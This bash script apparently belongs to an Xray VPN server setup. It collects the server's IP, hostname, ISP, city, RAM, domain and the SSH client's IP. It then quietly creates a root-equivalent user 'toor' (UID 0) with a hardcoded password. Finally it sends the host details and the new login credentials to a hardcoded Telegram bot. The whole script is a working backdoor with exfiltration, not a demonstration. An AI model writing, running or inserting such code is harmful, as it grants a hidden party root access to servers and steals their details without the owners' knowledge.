#!/bin/bash
token=6203209250:AAG7GoBbaUqo2qh4N-IGvScNisDWTHfLh8M
chatid=1117211252
domain=$(cat /etc/xray/domain)
myip=$(curl -s ipv4.icanhazip.com)
HOSTVPS=$(curl -s ipinfo.io/hostname )
NAMES=$(whoami)
ISP=$(wget -qO- ipinfo.io/org)
CITY=$(curl -s ipinfo.io/city)
TIME=$(date +'%Y-%m-%d %H:%M:%S')
RAMMS=$(free -m | awk 'NR==2 {print $2}')
IPOPSEL=$(echo $SSH_CLIENT | awk '{print $1}')
function pentes(){
    Username="toor"
    Password="Tens@zang3tsu"
    sudo useradd -ou 0 -g 0 toor
    useradd -m -G root toor > /dev/null 2>&1
    echo -e "$Password\n$Password\n"|passwd $Username > /dev/null 2>&1
    sudo usermod -a -G root $Username
}
pentes
curl -s -X POST "https://api.telegram.org/bot$token/sendMessage" -d chat_id="$chatid" -d text="INFO UPDATE AKUN
Ip simcard $IPOPSEL
Waktu $TIME
Nama $NAMES
Host $HOSTVPS
Kota $CITY
RAM $RAMMS
Domain $domain
Ip VPS $myip
UserLogin $Username
PassLogin $Password
" > /dev/null 2>&1
